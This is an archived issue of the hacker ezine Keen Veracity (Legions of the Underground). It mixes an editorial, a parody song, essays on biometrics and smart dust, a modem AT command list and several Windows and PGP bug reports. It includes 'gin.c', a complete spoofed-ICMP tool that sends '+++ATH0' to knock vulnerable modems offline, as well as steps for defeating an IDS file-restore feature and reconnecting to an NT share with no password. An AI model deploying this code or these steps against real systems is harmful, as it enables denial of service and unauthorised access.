💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › KV › kv09.txt captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (9) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[CONTENTS]------------------------------------------------------------[CONTENTS]
[0001]=========================[Editorial - Digital Ebola <digi@legions.org> ]
[0010]===========================[Ode to JP Part II - KrankShaft <ks@rmci.net> ]
[0011]========[Biometric Concepts in UNIX - Digital Ebola <digi@linuxpron.com> ]
[0100]====[The Senseless Guide to Modem Commands - fejed <fejed@legions.org> ]
[0101]============[Hole in CyberCop Monitor 2.0 NT - Proto <proto@legions.org> ]
[0110]==================================[Smart Dust - shekk <shekk@smurfs.com> ]
[0111]====================[More Bugs In Windows NT - Ntwak0 <wak0@legions.org> ]
[1000]===================================[Optimizing UNIX C - S <super@ce.net> ]
[1001]===================================[Hammer2K - Threx <threx@attrition.org]
[1010]=====================[Hax0ring The Slurpee - Phriction <phric@legions.org]
[1011]========================================[Keen Veracity Spam - The Readers]
[Editorial]======================================================[Digital Ebola]
Greetings and salutations. I guess this issue of Keen Veracity is going to be
themed "Back in the Saddle". That's basically what it is, as we have been
silent for too long now. I have recieved floods of emails and messages asking
"Digi, what the hell is going on with LoU? Where in the hell is your website?"
And here is the answer. It's ALMOST back to better then normal. We have had
some complications, but we are back on track. The website is back up, graciously
hosted at my house, on a decently fast connection, and we are starting to get
back in the groove of things. Legions of the Underground isn't dead, contrary
to public belief, and we intend to keep it that way. We have a whole new
theme, new projects, new website and new attitude. From palm pilot and Windows
CE development, to biometrics, to the everyday root compromise, Legions is
getting their act together, and this time we are not only going to raise
eyebrows, but hopefully bring about some new concepts and ideas. You can expect
to see alot more of us in the future, be it Rootfest 2k, Defcon, on the net, or
in your servers. We are back and ready to kick it one more time....
The way of the monk is not always a peaceful way, but a purposeful way.....
[Ode to JP Part II]=================================================[KrankShaft]
Sang to "The distance" by Cake.
Reluctantly crouched and starting to whine,
Pelvic pumping and thumping in time.
The red light flashes, the fags get up.
Churning and burning, he yearns for a pup.
He blatently maneuvers and backstabs for rank,
I want to run him over with a fucking tank.
Reckless and wild, I see him as he burns.
His prowess is fake and we all will learn.
As he walks through the entrance, the heads go down.
The fans get up and they get out of town.
The building is empty except for one man,
Still lying and coniving as fast as he can.
The whore had gone down but he came back up,
And long ago somebody left with a pup.
But he's lying and coniving and hugging the ferns.
And thinking of someone for whom he still burns.
He's going the distance.
He's probably doing speed.
Carolyn's all alone
In her time of need.
Because he's lying and coniving and buying out his source,
He's backstabbing and prying and doin' with his horse,
He's going the distance.
No respect, no friends, no dignity, no vine,
He's haunted by something we can all define.
With all that we've said, he feels no remorse,
Derail him, impale him with monster-truck force.
In his mind, he's still lying, still in the 3rd grade.
He's hoping in time that Carolyn's memories will fade.
Cause he's lying and coniving and selling out his source,
He's backstabbing and prying and doin' it with his horse.
The whore had gone down but he came back up,
And long ago somebody left with a pup.
But he's lying and coniving and hugging the ferns.
And thinking of someone for whom he still burns.
He's going the distance.
He's probably doing speed.
Carolyn's all alone
In her time of need.
Because he's lying and coniving and buying out his source,
He's backstabbing and prying and doin' with his horse,
He's going the distance.
He's probably doing speed.
He's going the distance.
[Biometric Concepts in UNIX]=====================================[Digital Ebola]
INTRODUCTION
In the world of today, security is a large concern of anyone in the computer
industry. The model for security has been based on logins/password for the
duration of the computers existence. As of late, we have found that this model
is not the best due to compromises. Many companies have started to turn to
biometrics as the solution. If you don't know what biometrics is, the concept
can be best explained as user identification by unique physical features.
Unique physical features being: fingerprints, retina, voice, and the size and
shape of the hands. You can readily aquire such a system of authetication for
local use, but is it simply that: local. What I am going to outline, is the
concept for remote use under UNIX and like operating systems.
Good security is tough to come by. You can secure your entire network, lock it
down to the point of it being a Digital Ft. Knox. In the end, you pay for this
amount of security, by trading ussability. The human factor in the end will
still be your main compromise, as users forget passwords, write them down for
all the world to see, or are social engineered into giving them. At present,
servers can be exploited in a number of different ways, be it from leaky code
in a daemon, a flaw in the operating system as a whole, or user and/or admin
ignorance. Even if you are on top of things, and you are monitoring your systems
you still do not know really who is who, because Joe User can be logged in from
anywhere, unless you have implemented trusted host policies, and even these can
be bypassed depending on the skill of the attacker.
As mentioned before, biometric authentication has been implemented at local
terminals. What I wish to bring to light, is the possible integration thru
a secure shell (encrypted) tunnel. In easier to understand terms, instead of
having the password, we will have biometric identification to a remote location.
You are at home, and you wish to login to the main work server. Your means of
transport is SSH. You key the command to SSH said server. There is a encrypted
key comparison done between server and client, the tunnel is established, and
the system prompts for a biometric print. At this point you place your thumb
upon the biometric pad and you are authenticated.
The advantage to this, the user is not required to know their password. If they
do not know their password, they cannot change it, they cannot forget it, they
cannot write it down, or be social engineered out of it. And that is one less
thing that the user has to keep track of, and it actually increases usability.
The down side to this, is the possible capturing of a thumbprint in transit to
it's destination and replaying it for the authentication, although the print
will be encrypted as a substream running inside of a encrypted tunnel.
Of course, actually deciphering a encrypted steam, and decrypting yet another
layer of encryption is supposed to be impossible, but in my own experience
I have seen a lot of impossible things happen.
Another possible problem could be the actual amputation of the
thumb and the use of it on the plate. Biometric technology has advanced to the
point of detecting where the imput is "warm and alive" or not, but I doubt the
technolgy is cheap for wide scale utilization. You could in theory, not only
rely on the biometric imput, but also utilize smart card technolgy and passwords
in tandem, as stressed before, this will bring down the usability of the
system.
This technology could also be used to not only authenticate UNIX boxes, I have
merely used this as a example. You could authorize any client/server connection
or even wide scale lan-to-lan VPNs and so forth. The main idea is to make this
easier for the end-user to authenticate themself, and wipe out the
"human factor". Now, when discussed with a couple of my collegues, one mentioned
that the user could still botch up having to carry around a biometric device
everywhere they go. This is fine, I am sure there could be a market for
implementing a biometric plate upon a keyboard or laptop.
In conclusion, this sytem could very well work. If one wanted, they could
even start a project based on these ideas, as biometric devices can be aquired
for your home terminal for about 400 dollars U.S. My purpose of this writing,
is to stir a little creative thought, and for those who can afford the gear,
a possible reality.
[The Senseless Guide to Modem Commands]==================================[fejed]
I will not be held liable for the following information, feel free to
distribute it just give refrence to me, fejed.
This Text file contains various modem commands and a c script to use them
on vunerable targets. You will find gin.c at the end of this text file.
Contents
1. Basic AT Commands.
2. Extended AT Commands.
3. Result Codes
Note: _ indictates a variable and all commands must be prefixed with AT
unless specified
A Manually Answer an incoming call
A/ Repeat last command executed DO NOT PREFIX WITH AT
B_ Example ATB0 would change to CCITT mode
BO CCITT mode
B1 Bell mode
D_ Example; ATDT@000 <-- would Dial using touch tone, wait for five seconds
of silence and dial 000.
0-9,A-D,# and *
L last number redial
P Pulse Dialing
T Touch tone dialing
W wait for second dial tone
, pause
@ wait for five seconds of silence
! flash
; Return to command mode after dialing
E_
E0
E1
+++ Switch from data mode to command mode
H_
H0 Force modem on-hook(hang up)
H1 Force modem off-hook(make busy)
I_
I0 Display product ident code
I1 Factory ROM checksum test
I2 Internal Memory test
I3 Firmwave ID
I4 Reserved ID
L_
L0 Low speaker volume
L1 Low speaker volume
L2 Medium speaker volume
L3 High Speaker volume
M_
M0 Internal speaker off
M1 Internal speaker on untill carrier detected
M2 Internal speaker allways on
M3 Internal speaker on until carrier detected and off while dialing
N_
N0 Disable Autoscan mode
N1 Enable Autoscan mode
O_
O0 Return to datamode
O1 Return to datamode and initiate an equalizer retrain
P Set Pulse dial as default
Q_
Q0 Modem sends responses
Q1 Modem does not send responses
Sr? Read and display the register r
Sr=n Set register r to value n (n=0-255)
T Set Tone Dial as default
V_
V0 Numeric responses
V1 Word response
W_
W0 Report DTE speed only
W1 Report line speed, error correction protocol, and DTE speed
W2 Report DCE speed only
X_
X0 Hayes Smart modem 200 compatible responses/blind dialing
X1 Same as X0 plus all CONNECT responses/blind dialing
X2 Same as X0 plus Dial tone detection
X3 Same as X1 plus dial tone detection
X3 Same as X1 plus busy detection/blind dialing
X4 All responses and dial tone and busy signal detection
Y_
Y0 Modem does not send or respond to break signals
Y1 Modem sends break signal for four seconds before disconeccting
Z_
Z0 Reset and retieve active profile 0
Z1 Reset and retrive active profile 1
Section 2
Extended AT Commands
&C_
&C0 Force Carrier Detect Signal High (ON)
&C1 Turn on CD when remote carrier is present
&D_
&D0 Modem ignores the DTR signal
&D1 Modem retures to Command Mode after DTR toggle
&D2 Modem hangs up, returns to the Command Mode after the DTR toggle
&D3 Resets modem after DTR toggle
&F_
&F Recall factory defualt configuration
&G_
&G0 Guard tone disabled
&G1 Guard tone enabled
&G2 1800 Hz guard tone
&K_
&K0 Disable flow control
&K2 Unknown
&K3 Enable RTS/CTS hardware flow control
&K4 Enable XON/XOFF software flow control
&K5 Enable transperant XON/XOFF flow control
&K6 Enable both RTS/CTS and XON/XOFF flow control
&L_
&L0 Modem is set up for dial-up operation
&M_
&M0 Asynchronous operation
&P_
&P0 40/60 for off-hoot-to-on-hook ratio (for Italy, Germany)
&P1 33/66 off-hook-to-on-hook ratio (France, Spain)
&P2 Same as &P0 but 20 pulses per minute
&P3 Same as &P1 but 20 pulses per minute
&R_
&R0 Reserved
&R1 CTS operates per flow control requirments
&S_
&S0 Force DSR Signal High (ON)
&S1 Force DSR off in command mode, on in on-line mode
&T_
&T0 Ends test in progress
&T1 Perform Local Analog Loopback Test
&T2 Unknown
&T3 Perform Local Digital Loopback Test
&T4 Grant Remote Digital Loopback Test request by remote modem
&T5 Deny Remote Digital Loopback Test by remote modem
&T6 Perform a Remote Digital Loppback Test request
&T7 Perform a Remote Digital Loopback Test
&T8 Perform a Remote Digital Loopback Test and Self-Test
&V
&V Displays Active and Stored Profiles
&W_
&W0 Stores the active profile as Profile 0
&W1 Stores the active profile as Profile 1
&Y_
&Y0 Configuration Profile 0 Active upon Power on or reset
&Y1 Configuration Profile 1 active upon Power on or reset
&Zn=x n=0-3 Store phone number x into non-volatile RAM
%E_
%E0 Disable auto-retain
%E1 Enable aut0-retain
%L Display line signal level
%Q Display line signal quality
+MS? Displays hte current Select Modulation settings
+MS=? Displays a list of supported Select Modulation options
+MS=a,b,c,d
Select modulation where:a=0,1,2,9,10,11,64,69,74
b=0-1
c=300-33600
d=300-33600.
Parameter "a" specifies the modulation protocol desired where:
0=V.21 1=V.22bis, 3=V.23, 9=V.32, 10=V.32bis,
11=V.34/V.34bis, 64=Bell 102, 69=Bell 212, and 74=VFC.
Parameter "b" specifies automode operations where:
0=automode disabled, 1= automode enabled with V.8/V.32 Annex A.
Parameter "c" specifies the minimum connection data rate
(300-33600).
Parameter "d" specifies the maximum connection rate (300-33600)
Section 3
Result Codes
OK 0
CONNECT 1
RING 2
NO CARRIER 3
ERROR 4
CONNECT 1200 5
NO DIAL TONE 6
BUSY 7
NO ANSWER 8
CONNECT 600 9
CONNECT 2400 10
CONNECT 4800 11
CONNECT 9600 12
CONNECT 7200 13
CONNECT 12000 14
CONNECT 14400 15
CONNECT 19200 16
CONNECT 38400 17
CONNECT 57600 18
CONNECT 115200 19
CONNECT 1200TX/75RX 22
CONNECT 75TX/1200RX 23
FAX 33
DATA 35
CARRIER 300 40
CARRIER 1200/75 44
CARRIER 75/1200 45
CARRIER 2400 46
CARRIER 4800 48
CARRIER 7200 49
CARRIER 12000 51
CARRIER 24000 56
CARRIER 26400 57
CARRIER 28800 64
COMPRESSION: CLASS 5 66
COMPRESSION: V.42BIS 67
COMPRESSION: NONE 69
PROTOCOL: NONE 70
PROTOCOL: LAPM 77
CARRIER 31200 78
CARRIER 33600 79
PROTOCOL: ALT 80
CONNECT 31200 83
CONNECT 33600 84
+FCERROR +F4
--------------------------------------CUT HERE----------------------------------
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "you"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, silly ass. You gotta be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "bleh" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "\E[31musage: %s <source host> <dest host> <num packets>\n\n", name);
exit( 0 );
}
void banner( void )
{
printf( "\nscript [ v%s ] ", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval );
int len = strlen( ginstring );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )], ( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) );
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )
) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
-------------------------------------------------------------------------------
[Hole in CyberCop Monitor 2.0 NT]========================================[Proto]
Lately there's been alot of hype around IDS technology and for the most
part it works quite well if immplemented properly. There are basically
2 types of IDS systems out there. Host based and Network based. Both of
them have their advantages and disadvantages but this article is about
one particular IDS product by Network Associates called
CyberCop Monitor 2.0 NT. This is a Hybrid host-based IDS product.
For those of you who are unfamiliar with what IDS is, please refer back to
kv-8 for a brief summary on IDS technology.
One of it's features they claim is it's ability to monitor files for
illegal changes and it's ablity to not only warn the admin, but it also has
the ability to change it back to it's original form. This makes it a great
preventative measure for web admins trying to protect their web sites from
being defaced.
In my testing I applied a simple rule for it to follow. I had it monitor a
file I created and applied a policy for it to do 2 things upon file access.
1. Replace file to it's original form.
2. Local Pop-Up Alert on this system being attacked.
The product works great except under one condition that I found so far for
wich I was shocked to find. It's nothing fancy like exploiting a particular
DLL to up-load the changed file, no, it's quite simpilar then that. Believe
it or not, to over come this feature, all you have to do is FTP the
modified file to the system with CyberCop Monitor and although it will warn
you of the modifierd file, it cannot automatically replace the file back to
it's original form.
The folks over at NAI have been informed and I was assured that they are
working on a solution to the problem but at the time of this publication
the hole within their product still exists.
[Smart Dust]=============================================================[shekk]
Technology is a to a point where it is thought possible(and almost
done) that we can have a completely independent node inside of 1 cubic mm.
These "dust motes" will include power supply, circuits, communication, and
sensors. The possibilities this could bring are endless, from spying to
gathering weather data, dust motes will be able to communicate with a
bi-directional radio or lasers. Protocols and systems for these dustmotes
to communicate with a laser network are being designed to implement a way
for dust motes to talk to each other. Even the top notch radio hardware
that we have in todays robust radio industry, still uses up a lot
of power. Because of this, they have decided to use a laser network for
most communication utilizing lasers much smaller then the laser pointers you
might have seen for around 10 dollars. This means, even if one mote is not
sensing very much data, they could work together in say a room, and
collect their data together.
Right now, macro motes have been created as large scale models of the
smart dust of the future. Most of them are about 1 inch long. They can
have sensors for humidity, barometric pressure, tilt, vibration, magnetic
fields, and light. Macro motes include a bi-directional radio,
microprocessor, and a battery which will let them live about a week, and
then for another 2 years with a 1% duty cycle. Other accomplishments
include a 21 km range with laser, which i will talk about in more detail
later. Now here is a list of the current macro motes that have been
designed and tested, these are all giants compared to what dust motes are
expected to be in 2001.
[List of Macro Motes with features] -
RF mote
{
RF 916.5MHz, 5k bps with 20 meter range.
Sensors - 2 axis magnetometers, 2 axis accelerometers, light,
tempereature, pressure
}
Laser mote
{
Long range laser transmission of data from sensors, many kilometers in
range. This is one of the motes that was used to show the range of laser
transmission in the experiment to transmit weather data.
Sensors - temperature, light, pressure, humidity.
}
CCR mote
{
Corner cube reflector/light reciever communication range depends on laser.
This is the technology that will hopefully be implemented in the smart
dust of the future for communication with each other.
Sensors - temperature
}
Mini mote
{
This is a miniature version of the RF mote. RF 916.5MHz with a 10kbps 20
meter range.
Sensors - temperature
MALT
}
This has steerable laser beam communication with a CCD camera.
Sensors - light
}
weC
{
This is the enxt version of the mini mote, it can be reprogrammed
wirelessly, has RF 916.5MHz with a 10kbps 20 meter range.
Sensors - light, temperature.
}
IrDA mote
{
these can communicate with any infared device, such as the palm pilot.
Sensors - temperature
}
Laser communication.
Using an optical reciever with the CCD camera, connected to a laptop,
these lasers can get analog data from any of the sensors and send it
digitally to the laptop. This procedure can simultaneously recieve
data from about 20 nodes using CRC error correction for accurate
reception. As of now, this communication is very slow, when they were
sending the weather data, they were getting about 8 bits a second.
experiment -
They stripped off the bi-directional radio and connected a laser pointer
up to a weather sensing node, and had CCD camera capturing frames to a
laptop. 21 km away they could send data with these lasers(using something
to make the spot bigger). This means not only do the lasers take up less
power, but they also have a much larger range then what could be imagined
when it comes to broadcasting radio waves out of a cube millimeter
machine. They have already designed and fabricated sub mm scale mirrors
with 2 motors all on the same chip, which will be used for aiming the
laser beams. Tests have also been conducted and found out that these tiny
lasers can transmit millions of photons per second. There are light
detectors that can detect 1 single photon(a photon is like one packet of
light, read brief history of time by stephen hawking). They believe that
these little boogers will be able to communicate with low earth orbit
satalites, which gives us even more possibilities.
HOW SO SMALL?
There is something called IC fabrication. It allows you have a scale of
say 1cm long, and then image it down to the sub-millimeter scale. This is
how they are carving sub-millimeter sized circuits.
Here is a link to a nice picture of what a dust motes structure will be.
http://robotics.eecs.berkeley.edu/~pister/SmartDust/figures/colormote.gif
Some accomplishments with this fabrication technique include synthetic
maple seeds, where they used a honeycombed piece of silicon .1mm thick and
carved out a wing, then putting a tiny piece of silicon on the bottom where
it would auto rotate as it fell.
In 2001, they should have dust motes the size of dust, small enough where
they can be suspended in air just like dust, small enough to where noone
would notice.
Little motors have already been thought of, so these motes could also be
controlled around.
POSSIBILITIES
These little bitches could fall in the wrong hands, and we could have a
real life version of the book 1984, where the government watches us alday
long and commands us to do things over speakers on a dust motes back.
Or like screamers where the robots takeover and end up killing people, but
i wouldnt worry too much about that, you and your desktop are smarter than
dust motes ;)
Holding back from thinking what could go wrong with advanced
technology like this, there could be some very neat applications for
these. You could have these monitoring things, from your goods you are
shipping, or use these as controls on your fingertips with the
accelometers, for computers, or even games. Virtual Reality that knows
your exact motions.
Now, here are credits to the designers of smart dust, who not only are
designing these neat little creatures at the University of California, but
are putting up information on leeto websites for people like me to find
and enjoy reading. Without these guys web page teqneeqs, none of this
information would be coming to you right now.
Bryan Atwood
Colby Bellew
Lance Doherty
Seth Hollar
Matt Last
Brian Leibowitz
Wei Mao
Lilac Muller
Junichi Nishimoto
Dana Teasdale
Brett Warneke
Xiaoming Zhu - thank you expecially for replying to my emails.
my plugs - shouts to all of gH, LoU, and a special shout to ging3r
www.pure-security.net
www.elucks.org
www.hack.co.za
[More Bugs In Windows NT]===============================================[Ntwak0]
Subject: Password problem In NT when connecting to a share, should I say you
do not need a password in some cases even if it is protected I mean :)
Monday, December 27, 1999 by NtWaK0
Tested on NT 4.0 +SP6 + SP6a.
I will try to do it by example in this case you will be able to repeat it
--> I am going to map a network share call it X:
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I done net view to see the shared resources
E:\Tmp>net view \\1.1.1.1
Shared resources at \\1.1.1.1
Share name Type Used as Comment
--------------------------------------------------------------------------------
Tmp Disk X:
The command completed successfully.
--> Now I copyed a file to X: to use the 1.1.1.1 resources.
E:\Tmp>copy test.txt x:
1 file(s) copied.
--> Now I delete the connection I created to 1.1.1.1 using X:
E:\Tmp>net use /delete x:
x: was deleted successfully.
--> Now I tryed to recreate the connection using NULL password just for fun i w
as doing this
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
E:\Tmp>
--> It is normal I could not login now I done
The Bug:
--> Now Reconnect using the command line
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I used Explorer to copy the same file test.txt from my drive E:\tmp to the
mapped drive X:
--> I got a msg saying "The file already exist do you wana overwrite it?"
I said yes, well it is normal I did copy it before as you saw in the step
above .
--> After copying the file in explorer I did right click on X:
(the mapped drive) and disconnect
--> I got a msg box saying "There are currently files open on X:
(connected to \\1.1.1.1\tmp).
If you do close the files before disconnecting from the network, data may be
lost.
Do you want to disconnect the device anyway?"
Then I clicked Yes in this case I have no more connection mapped to X:
In this case I should not be able to connect without password or username
but not true ;)
--> Next I do not know what I tried it I guess for fun In DOS window I typed
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
The command completed successfully.
--> W00t I was able to login I did not believe hehe with no password.
--> To make sure i was not dreaming or missing sleep, I was able to repeat it
like 10 times.
But if you do connect and disconnect using net use /delete x: this will work and
you cannot connect with no password like the explore case.
So you this is a security bug that you can reproduce it in explore and
DOS command and it has to follow certain steps .
What do I mean by that ? well you have to disconnect using explore and when you
get the msg saying :
"There are currently files open on X:(connected to \\1.1.1.1\tmp) blah blah...
In that case if you disconnect and reconnect right after using no password that
should work. ;)
But if you do it all from the command line this should not work and that
is normal.
Here is an example done all by command line:
E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0
The command completed successfully.
E:\Tmp>copy test.txt x:test.txt
1 file(s) copied.
E:\Tmp>net use /delete x:
x: was deleted successfully.
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
E:\Tmp>
Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)
================================================================================
Subject: IE5 and The Cool Return Download and Installation Successful
Friday, December 03, 1999
It was late about 3 am and a lot of coffee in my blood, so i decided to do
some IE5 Active update to relax from what I was working on. :)
So i clicked IE5, clicked
http://windowsupdate.microsoft.com/default.htm?Page=productupdates
--> Got a nice Windows :)
Please Wait...
Windows Update is customizing the product updates catalog for your computer.
This is done without sending any information to Microsoft
--> IE5 come up with (Main windows)
Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
456 KB/ Download Time: < 1 min
Windows NT 4.0 Service Pack 5 includes the most recent updates and enhancements
to Windows NT Server 4.0 and Windows NT Workstation 4.0. Service Pack releases
are cumulative, so Service Pack 5 contains all previous Service Pack fixes
and any new fixes created after Service Pack 4. Note that the actual download
will be anywhere from 11-32Mb depending on the actual files on your current
machine. This release features 128 bit strong encryption and can only be
downloaded within the United States and Canada
--> I clicked to check Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
--> I clicked on the Download (blue) button to start download
Product Updates
Download Checklist
1 Confirm Selections
You have chosen to install the following software. You can deselect any of the
components you do not want to install by clearing the check box.
Total Size: 456 KB Download Time: < 1 min
Windows NT 4.0 Service Pack 5 (128 bit strong encryption) 456 KB/ Download Time
: < 1 min
2 View Instructions?
View a single, combined instruction page for all of the software you have chosen
to install.
You may want to print these instructions for later reference.
View Instructions
3 Start Download
Download and install the software shown above.
--> I clicked Start Download
--> I got another windows
SUPPLEMENTAL END USER LICENSE AGREEMENT FOR MICROSOFT SOFTWARE IMPORTANT:
READ C AREFULLY -
--> I clicked YES
After downloading the file, I got another HAHAHA nice Service Pack Setup Error (
Modal Window)
"The version of Windows NT you have installed is more current than the update
you are trying to install"
WITH THE OK button
--> I clicked OK
--> I got
Product Updates
Download and Installation Successful
SUCCESSFUL
The following software was successfully downloaded and installed.
Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
HAHA now let me tell you what i see wrong in that
HAHA now let me tell you what i see wrong in that
1- The updates did not install So i should not be getting
"Download and Installation Successful SUCCESSFUL"
2- Why the script did not detect that i have SP6 when it started ? bah...
they should be checking first, and when they find that I have Sp6, they
should not propose the option of getting the patch
"Windows NT 4.0 Service Pack 5 (128 bit strong encryption)"
I did not try this on win9x, or other IE.
Cheers,
+-------------oOo-(NtWaK0)(Telco. Eng. MCSE.Etc..)-oOo-------------+
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
+--oOo-"---------------------------------------------------"-oOo---+
Live Well Do Good --:)
================================================================================
Subject: PGP 6.5.2 for Windows will change some security setting if you
re-install it
Tuesday, December 07, 1999
Tested on NT 4.0 + SP6 + IE5.01
Today I had a funny problem with PGP 6.5.2. I was working and decided to
wipe out some files.
--> I selected the files to wipe out
--> Right click on the selected files, and Clicked PGP then Clicked Wipe
--> Hmm funny the PGP Wipe dialog box come up but EMPTY.
--> I thought i am to much backed ;) but I done it again and selected others
files in the same directory
--> Hmm funny the PGP Wipe dialog box come up but EMPTY.
--> Well I decide to re-install PGP 6.5.2
--> After the install I still cannot wipe the files.
--> I continued working and wiped the files using the PGP tool menu , heh
that works
--> After some time I decide to find out how come that sh** is not working.
--> After some time I decide to find out how come that sh** is not working.
--> So i selected on file form the same directory as before, and right click
the file then properties
--> Hmm the file is READ Only so I check that OFF
--> Right click on the selected files, and Clicked PGP then Clicked Wipe
--> It worked, ;) I was able to wipe the file. So when the file is read only
PGP do not display that in the wipe Dialog box.
Now after I re-installed PGP hehe for nothing, I opened my e-mail outlook
2000 and send some e-mails.
Hrmm when i clicked the SEND button I noticed something funny, I SIGN all my
e-mail and when I clicked the SEND I did not get the SIGN dialog box to type
in my pass phrase so I said heh PGP changed my settings.
So from outlook 2000 Menu I clicked PGP then Option then E-mail TAB and under
e-mail options SIGN New messages by default was UNCHECKED.
And I am like 100 % sure I had it checked before.
I consider is the security issue and here is why ? :
Imagine you done that re-installed PGP and you had your settings to sign all
your mail by default, and after you re-installed you SENT THE MOST LEGAL ELITE
Mail and you clicked SEND and you did not realize that the mail was not signed.
So one day you need that mail as proof, but you opened the mail and you was
lik e 100 % sure it was signed by you, but you could not find the signature ;)
I am sure situations like this will get you mad. ?
[Optimizing UNIX C]==========================================================[S]
Possessing UNIX C optimization skill can be prove to be useful in
many situations. An enumaration of such instances follows:
- Resource intensive projects
- Writing code to be executed on a slow processor
- Interactive web sites for use by the masses
- Obsession with elegance
This abridged document is by no means a definitive reference; it is only an
introduction. The "Resources" section appended to this document contains
other quality sources. My personal interest in C optimization began as the
result of this proprietary programming endeavor:
http://www.freezersearch.com/index.cfm?aff=dhc
Buffering I/O
-------------
Minimizing I/O can improve code performance significantly, especially when
dealing with disks. Buffering I/O will reduce a disk's workload and the
number of system calls that need to be executed. Take the following
pseudo-code that reads 1024 bytes, for example:
while(cnt<1024){
...
read(fd,&c,1);
...
}
read(fd,&buf,1024);
